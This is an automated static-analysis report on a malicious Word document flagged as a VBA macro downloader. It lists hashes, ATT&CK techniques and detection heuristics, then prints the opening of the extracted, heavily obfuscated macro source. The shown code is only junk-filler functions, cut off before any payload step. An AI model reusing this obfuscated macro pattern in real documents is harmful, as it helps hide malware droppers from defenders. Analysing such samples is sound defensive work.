Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4548e0836dabf4cd…

MALICIOUS

Office (OLE)

Size: 101.5 KB
Created: 2017-08-30 21:36:00
Authoring application: Microsoft Office Word
First seen: 2018-08-15
MD5: 6b6052d87ebdb24b1b32512a1256496c
SHA-1: cb5ed8f16e600c853e2f4c930c90ceb279d5d997
SHA-256: 4548e0836dabf4cd7c924e9f29eae89143b5285377cb2c1c5ed6396b748c0d23
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer

The file is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. ClamAV identifies it as 'Doc.Macro.VBSDownloader-6336817-0', strongly suggesting its purpose is to download and execute a secondary payload. The presence of the AutoOpen macro and the CreateObject call are common indicators of macro-based malware downloaders.

Heuristics (7)

  • ClamAV: Doc.Macro.VBSDownloader-6336817-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17564 bytes
SHA-256: f3fc4bb77d37012e29a046383f28e43b7caa65a413fa2d2e76cf9ce8a7e8d963
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function ArsRSUh()
spWywkz = 4192
Dim FFXgwCLyNSr(4192)
FFXgwCLyNSr(1697) = CPGBgXZNW
 FFXgwCLyNSr(3200) = RLvCbFuMD
 FFXgwCLyNSr(1106) = BapYEBNPvSe
 FFXgwCLyNSr(1820) = FwXgusde
 FFXgwCLyNSr(3192) = XdfgDef
 FFXgwCLyNSr(1131) = EvkUcWdkaHM
 FFXgwCLyNSr(1568) = kVrhuCvENVm
 FFXgwCLyNSr(2197) = LYWmmsSGF
 FFXgwCLyNSr(295) = sMBwPUPk
 FFXgwCLyNSr(869) = ytSgAfDUN
 FFXgwCLyNSr(1817) = CapSUdZMHHN
 FFXgwCLyNSr(209) = wnCNmEKRuA
 FFXgwCLyNSr(1243) = FdcrSNCpxNH
 FFXgwCLyNSr(1964) = ggRrAAf
 FFXgwCLyNSr(2670) = cKHpkafXVUP
 FFXgwCLyNSr(2985) = uNCmLXadFR
 FFXgwCLyNSr(463) = kCgEctbLY
 FFXgwCLyNSr(1679) = SgxmKfyAWA
 FFXgwCLyNSr(271) = kkTeWVwK
 gVaHPrb = "gezdcbnS"
 ANSgrXe = "KGctbmeX"
 HYyKpGMvbP = "kgMGbykYND"
 dPDFnrxRSK = "nCmYbKFerG"
 dWZUvMgpFwT = "yNwRBanwh"
 FyDStNGHz = "xgBYPnY"
 GGxxfSk = "ZPhSBATcWeU"
 xKkyBhFD = "szysuwxMP"
 XpGGFrsm = "zaFnrypuSc"
 sAXcxVLaUW = "VauFGTskCA"
 kxbNSUn = "kfdLfhD"
 vmHHrDZCM = "KbwBGSLAE"
 GnDGvNyVW = "aHTbDxkC"
 FewPRsZpD = "eUCMFUm"
 eBuyzWaDTC = "tbSuahmbF"
 PzxRmXeWXSD = "psNtZmgkG"
 VEfYrsrKb = "MhBZTYKv"
 exPeDdNxGFn = "WXWyvPaVG"
 rhYEKFdfkED = "mGtzreFNb"
 End Function
Function tzxrKeRTGk()
sbDEnMMud = 172
Dim dHyuPCmXC(172)
dHyuPCmXC(119) = DNpkWNWf
 dHyuPCmXC(83) = PMyzcYYfdF
 dHyuPCmXC(127) = tKbEdPpTcx
 dHyuPCmXC(69) = cnhhWGays
 dHyuPCmXC(116) = hmrNByr
 dHyuPCmXC(129) = htfpdchT
 dHyuPCmXC(157) = ceCvYrbb
 dHyuPCmXC(79) = HAfawMZcrKE
 dHyuPCmXC(143) = GNZXVRsU
 dHyuPCmXC(117) = pcuyfRbu
 dHyuPCmXC(143) = fDvzKKbepGC
 dHyuPCmXC(84) = DVNzEccsmm
 dHyuPCmXC(94) = AhUapxvMNv
 dHyuPCmXC(159) = sDdBwKCXswp
 dHyuPCmXC(155) = zFfkLUkPZ
 dHyuPCmXC(123) = nyVEsHwRr
 dHyuPCmXC(144) = DrRCfLCXdnr
 dHyuPCmXC(131) = vxTbhbyddAw
 dHyuPCmXC(139) = eayCykzZAG
 TFvvezWgKN = "yWGDNXWX"
 WKDSaBLzny = "TybTDWS"
 zknMhEtgx = "gShyUPHrvp"
 SmhGRMupW = "hRxGDVx"
 PxbeRkuFLC = "xCWCvWR"
 DnMyZKaPUN = "MLDaKpY"
 UubTwxgpE = "GEuPNgGXwc"
 pBMAaWGDk = "pNNHwUkryb"
 GHWyAzLrDKH = "byHsaLpS"
 umNUPVvVmyF = "CBVhVHk"
 wPKzgdmkbPR = "rGMeCnpWkg"
 XunhGsUm = "AXfHcemKcf"
 wTLTtNvPY = "GADrXSyvH"
 treNbfhS = "vbcbSEbF"
 chwyyDZA = "yUBesphfnS"
 chTbHftdBW = "xZXdTYaRd"
 MffpEattm = "kEuerYnY"
 LcWVHaMcxV = "DsTbAXvZ"
 End Function
Function ybeLHvC()
fUsUGBdbcdc = 4338
Dim ehYFMLyaGMg(4338)
ehYFMLyaGMg(1954) = ngHSRADvtgZ
 ehYFMLyaGMg(500) = SbwysDyp
 ehYFMLyaGMg(2579) = MPrPakMrNV
 ehYFMLyaGMg(2578) = frYGGkcM
 ehYFMLyaGMg(845) = FYcdFeS
 ehYFMLyaGMg(1674) = tMHZFMyb
 ehYFMLyaGMg(1724) = bgSZbLGuDZ
 ehYFMLyaGMg(2344) = HMhLhUwxUP
 ehYFMLyaGMg(138) = esadmpDS
 ehYFMLyaGMg(888) = ZxvDPkNAA
 ehYFMLyaGMg(3687) = hDfrPff
 ehYFMLyaGMg(3503) = skyBWxyAZ
 ehYFMLyaGMg(3805) = KRXAdywBpax
 ehYFMLyaGMg(1223) = FxwfcpDhpd
 ehYFMLyaGMg(115) = VHLYaGk
 ehYFMLyaGMg(2894) = XhMGDVpNWDW
 ehYFMLyaGMg(4128) = RnwdVUuHy
 ehYFMLyaGMg(4165) = vsrfxNAVuE
 ehYFMLyaGMg(1343) = DtWnpEh
 ehYFMLyaGMg(3267) = pUpnPEazNh
 ehYFMLyaGMg(1723) = TrVANtWgPZ
 ehYFMLyaGMg(2640) = bdPCahPaeV
 ehYFMLyaGMg(926) = fKTkaUBBAkp
 zufAfeM = "vkLfPRRY"
 vfxsxbKbFm = "SydUyKg"
 zbTeTUzLBTR = "MdpLbyr"
 ykcfeZTUps = "AABEpEC"
 NHMHrZK = "zypsKyM"
 ZavGWrTnx = "VLeuFGDkD"
 hkABzpFSYS = "TSygKSkp"
 fkvmAaBt = "nSsbEYFgZtE"
 LXXZBeyANfS = "NYcbRZgN"
 cwUTLeMp = "TmruTgnC"
 htdzXEGp = "WffPpsTZh"
 aSEHUBDnxy = "wsybhpUa"
 End Function
Function RcVNnmMGBV()
tbzZXvdDt = 3677
Dim HFAbKggU(3677)
HFAbKggU(2412) = GaMezczDDU
 HFAbKggU(964) = YMSfUGNs
 HFAbKggU(3491) = KBzsHesms
 HFAbKggU(748) = fhXSBZGTHuX
 HFAbKggU(3431) = UTsxWkwwzV
 HFAbKggU(3426) = nyFZuPwv
 HFAbKggU(508) = wKecbXNSe
 HFAbKggU(93) = fkdhadDA
 HFAbKggU(1806) = ftcZvtku
 HFAbKggU(3237) = LkLNNngzkdC
 HFAbKggU(2571) = aNKdytR
 HFAbKggU(2031) = 
... (truncated)